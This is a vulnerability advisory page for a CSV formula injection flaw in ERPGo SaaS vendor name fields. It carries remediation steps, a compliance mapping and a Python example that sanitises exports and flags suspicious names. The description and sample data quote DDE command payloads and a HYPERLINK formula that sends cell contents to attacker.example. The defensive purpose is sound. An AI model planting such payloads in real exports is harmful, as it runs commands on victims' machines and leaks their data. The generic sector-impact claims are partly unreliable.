Vulnerabilities

CVE-2023-54348

High
CWE-1236 (Improper Neutralization of Formula Elements in a CSV File) — Weakness Type
Published: May 5, 2026  ·  Modified: May 12, 2026  ·  Source: NVD
CVSS v3
8.8
🔗 NVD Official
📄 Description (English)

ERPGo SaaS 3.9 contains a CSV injection vulnerability that allows authenticated attackers to execute arbitrary code by injecting formula payloads into vendor name fields. Attackers can add malicious formulas like =10+20+cmd|' /C calc'!A0 in the vendor creation form, which execute when the exported CSV file is opened in spreadsheet applications.

🤖 AI Executive Summary

ERPGo SaaS 3.9 contains a high-severity (CVSS 8.8) CSV injection vulnerability (CVE-2023-54348) that lets an authenticated, low-privileged user store spreadsheet formulas in vendor name fields. When another user exports vendors to CSV and opens the file in a spreadsheet application, the stored formulas are evaluated with that user's privileges; the payload runs on the workstation of whoever opens the export, not on the ERPGo server. The risk to Saudi organizations using ERPGo is concentrated in finance and supply-chain teams, who are the usual consumers of vendor exports.


🤖 AI Intelligence Analysis Analyzed: May 8, 2026 16:33
🇸🇦 Saudi Arabia Impact Assessment
High impact on Saudi banking sector (SAMA-regulated institutions), government procurement systems (NCA), and large enterprises using ERPGo for vendor management. Supply chain disruption risk for ARAMCO and energy sector suppliers. Healthcare organizations managing vendor relationships through ERPGo face operational disruption. Telecom operators (STC, Mobily) using ERPGo for supplier management are at risk. The vulnerability enables insider threats and supply chain compromise, particularly concerning given Saudi Arabia's Vision 2030 digital transformation initiatives and increased reliance on SaaS solutions.
🏢 Affected Saudi Sectors
Banking and Financial Services, Government and Public Administration, Healthcare, Energy and Utilities, Telecommunications, Manufacturing and Supply Chain, Retail and E-commerce, Education
⚖️ Saudi Risk Score (AI)
8.2
/ 10.0
🔧 Remediation Steps (English)
IMMEDIATE ACTIONS:
1. Disable CSV export functionality in ERPGo until patch is available
2. Restrict vendor creation/modification to trusted administrators only
3. Implement input validation: block formula characters (=, +, -, @, tab, carriage return) in vendor name fields
4. Educate users: warn against opening CSV files from untrusted sources and disable formula execution in spreadsheet applications

COMPENSATING CONTROLS:
5. Harden spreadsheet applications against the payload class in the description: in Excel, disable "Dynamic Data Exchange Server Launch" and "Dynamic Data Exchange Server Lookup" under Trust Center > External Content and keep Protected View enabled for files from the internet; in LibreOffice Calc, decline any prompt to update external links when opening an untrusted file. Macro settings do not affect formula or DDE evaluation, so "Disable all macros" is not a mitigation for this issue
6. Implement CSV sanitization in the export path: prefix any field that begins with =, +, -, @, tab or carriage return with a single quote ('), wrap every field in double quotes and double any embedded double quotes. Quoting alone is not enough, since spreadsheets evaluate "=1+1" after unquoting it; the leading apostrophe is visible in some viewers, which is the cost of forcing text interpretation
7. Export to PDF where a read-only report is sufficient. XLSX is not a macro format and is not safer by itself: a cell written as a formula string is still evaluated, so the export library must write vendor names as literal string cells
8. Monitor vendor creation logs for suspicious characters and formula patterns
9. Restrict outbound connections from workstations that open exported files, so that formula functions such as HYPERLINK or WEBSERVICE cannot reach attacker-controlled hosts to exfiltrate cell contents; segmenting the spreadsheet application by network does little against a payload that runs locally

DETECTION:
10. Create SIEM rules that flag vendor records whose name field begins with =, +, -, @, tab or carriage return, or contains the DDE sequence |' or a cell reference such as !A0; matching these characters anywhere in the field will generate false positives from legitimate names such as "Al-Noor" or phone numbers that start with +
11. Monitor CSV file access and modifications in audit logs
12. Alert on vendor names containing command execution patterns (cmd, powershell, bash)
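The following is an added example for this page, not ERPGo code (ERPGo is a Laravel/PHP application; Python is used so the logic can be run and checked). It ties together remediation items 3 and 6 (neutralise formula triggers before the field reaches the CSV writer) and detection items 10 and 12 (flag stored vendor names that look like payloads). The vendor records are constructed sample data; the second name is the payload quoted in the description. Function names, the `attacker.example` host and the regexes are the author's assumptions, not anything from ERPGo or NVD.

```python
"""Defences against CSV formula injection (CWE-1236) in an ERP vendor export.

Added example; not ERPGo code. Covers sanitising fields before export and
flagging stored vendor names that resemble formula payloads.
"""
import csv
import io
import re

# Characters that make Excel, LibreOffice and Google Sheets interpret a cell
# as a formula (OWASP CSV-injection list): =, +, -, @, tab, carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Detection patterns (assumed, not from the advisory). DDE_RE matches the
# pipe-plus-quote sequence in the sample payload (cmd|' /C calc'!A0);
# COMMAND_RE matches the interpreter tokens from detection item 12;
# EXFIL_RE matches functions that can send cell contents to a remote host.
DDE_RE = re.compile(r"\|\s*'")
COMMAND_RE = re.compile(r"\b(cmd|powershell|bash)\b", re.IGNORECASE)
EXFIL_RE = re.compile(r"\b(HYPERLINK|WEBSERVICE|IMPORTXML|IMPORTDATA)\s*\(",
                      re.IGNORECASE)

# Constructed sample vendor records (not real ERPGo data).
SAMPLE_VENDORS = [
    {"name": "Al-Noor Trading", "email": "sales@example.com", "phone": "+966500000000"},
    {"name": "=10+20+cmd|' /C calc'!A0", "email": "x@example.com", "phone": "0500000000"},
    {"name": "@SUM(1+9)*cmd|' /C calc'!A0", "email": "y@example.com", "phone": "0500000001"},
    {"name": '=HYPERLINK("https://attacker.example/?"&A1,"Invoice")',
     "email": "z@example.com", "phone": "0500000002"},
]
FIELDS = ["name", "email", "phone"]


def sanitize_csv_field(value) -> str:
    """Force text interpretation of a field that would otherwise be a formula.

    A single quote is prepended when the field (ignoring leading spaces)
    starts with a trigger character. CSV quoting alone is not enough:
    spreadsheets evaluate "=1+1" after unquoting it. Some viewers display
    the apostrophe; that is the cost of this approach.
    """
    text = "" if value is None else str(value)
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        text = "'" + text
    return text


def export_csv(rows, fieldnames=FIELDS) -> str:
    """Write rows as CSV with every field sanitised and quoted; embedded double
    quotes are doubled by the csv module's default doublequote handling."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL,
                            lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: sanitize_csv_field(row.get(k)) for k in fieldnames})
    return buf.getvalue()


def roundtrip_is_safe(csv_text: str) -> bool:
    """Parse CSV text the way a spreadsheet would and report whether any cell
    would still begin with a formula trigger after unquoting."""
    cells = (cell for row in csv.reader(io.StringIO(csv_text)) for cell in row)
    return not any(cell.lstrip(" ").startswith(FORMULA_TRIGGERS) for cell in cells)


def flag_suspicious(value) -> list[str]:
    """Return the reasons a stored vendor name looks like a formula payload.

    Only a leading trigger counts; "-" or "+" elsewhere in a name
    (Al-Noor, +966...) is legitimate and would flood a SIEM rule.
    """
    text = "" if value is None else str(value)
    reasons = []
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        reasons.append("leading formula trigger")
    if DDE_RE.search(text):
        reasons.append("DDE pipe syntax")
    if COMMAND_RE.search(text):
        reasons.append("command interpreter token")
    if EXFIL_RE.search(text):
        reasons.append("exfiltration-capable function")
    return reasons


def scan_vendors(rows) -> dict[str, list[str]]:
    """Map each suspicious vendor name to its reasons, for log review or a SIEM feed."""
    return {r["name"]: reasons for r in rows if (reasons := flag_suspicious(r["name"]))}


if __name__ == "__main__":
    print(export_csv(SAMPLE_VENDORS))
    for name, why in scan_vendors(SAMPLE_VENDORS).items():
        print(f"ALERT {name!r}: {', '.join(why)}")
```

Run stand-alone, the script prints the sanitised export (every payload now begins with an apostrophe inside its quoted field, and the +966 phone number is prefixed as well) followed by one alert per injected record. The `roundtrip_is_safe` check is the regression test to keep next to the export code: it re-parses the CSV and fails if any cell would still be read as a formula.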
🔧 Remediation Steps (Arabic version, translated)
IMMEDIATE ACTIONS:
1. Disable the CSV export function in ERPGo until a patch is available
2. Restrict vendor creation/modification to trusted administrators only
3. Apply input validation: block formula characters (=, +, -, @, tab, carriage return) in vendor name fields
4. Educate users: warn them against opening CSV files from untrusted sources and disable formula execution in spreadsheet applications

COMPENSATING CONTROLS:
5. Configure spreadsheet applications (Excel, LibreOffice) to disable automatic formula execution
6. Apply CSV sanitization: add a single quote (') before vendor names prior to export
7. Export to alternative formats (PDF; XLSX only if vendor names are written as literal string cells, since formula cells are still evaluated)
8. Monitor vendor creation logs for suspicious characters and patterns
9. Restrict network access from the workstations that open exported files

DETECTION:
10. Create SIEM rules to detect vendor records containing formula characters
11. Monitor CSV file access and modifications in audit logs
12. Alert on vendor names containing command execution patterns
📋 Regulatory Compliance Mapping
🟢 NCA ECC 2024
ECC 2024 A.5.1.1 - Information security policies and procedures
ECC 2024 A.5.2.1 - User access management and authentication
ECC 2024 A.5.3.1 - Cryptography and data protection
ECC 2024 A.5.4.1 - Physical and environmental security
ECC 2024 A.6.1.1 - Incident management and response
🔵 SAMA CSF
SAMA CSF ID.AM-2 - Software and hardware inventory
SAMA CSF PR.AC-1 - Access control and authentication
SAMA CSF PR.DS-1 - Data security and protection
SAMA CSF DE.CM-1 - Detection and monitoring
SAMA CSF RS.RP-1 - Response planning and procedures
🟡 ISO 27001:2022
ISO 27001:2022 A.5.15 - Access control
ISO 27001:2022 A.5.16 - Identity management
ISO 27001:2022 A.5.23 - Information security for use of cloud services
ISO 27001:2022 A.8.1 - User endpoint devices
ISO 27001:2022 A.8.32 - Change management
🟣 PCI DSS v4.0.1
PCI DSS 3.2.1 - Strong cryptography for data protection
PCI DSS 6.2 - Bespoke and custom software developed securely
PCI DSS 6.2.4 - Prevention of common software attacks, including injection flaws
PCI DSS 6.3.3 - Security patches and updates
PCI DSS 10.2 - Audit logging to detect anomalies and suspicious activity
📊 CVSS Score
8.8
/ 10.0 — High
📊 CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: N (Network)
Attack Complexity: L (Low)
Privileges Required: L (Low)
User Interaction: N (None)
Scope: U (Unchanged)
Confidentiality: H (High)
Integrity: H (High)
Availability: H (High)
Caveat: the published vector scores User Interaction as None and Scope as Unchanged, yet the attack described above only succeeds when a victim opens the exported CSV in a spreadsheet application (UI:R), and the payload runs on that victim's workstation rather than in ERPGo (a scope change). Treat 8.8 as NVD's figure, not as a measure of how easily the attack lands.
📋 Quick Facts
Severity: High
CVSS Score: 8.8
CWE: CWE-1236
EPSS: 0.07%
Exploit: No
Patch: ✗ No
Published: 2026-05-05
Source Feed: nvd
🇸🇦 Saudi Risk Score
8.2 / 10.0 - Saudi Risk
Priority: HIGH
🏷️ Tags
CWE-1236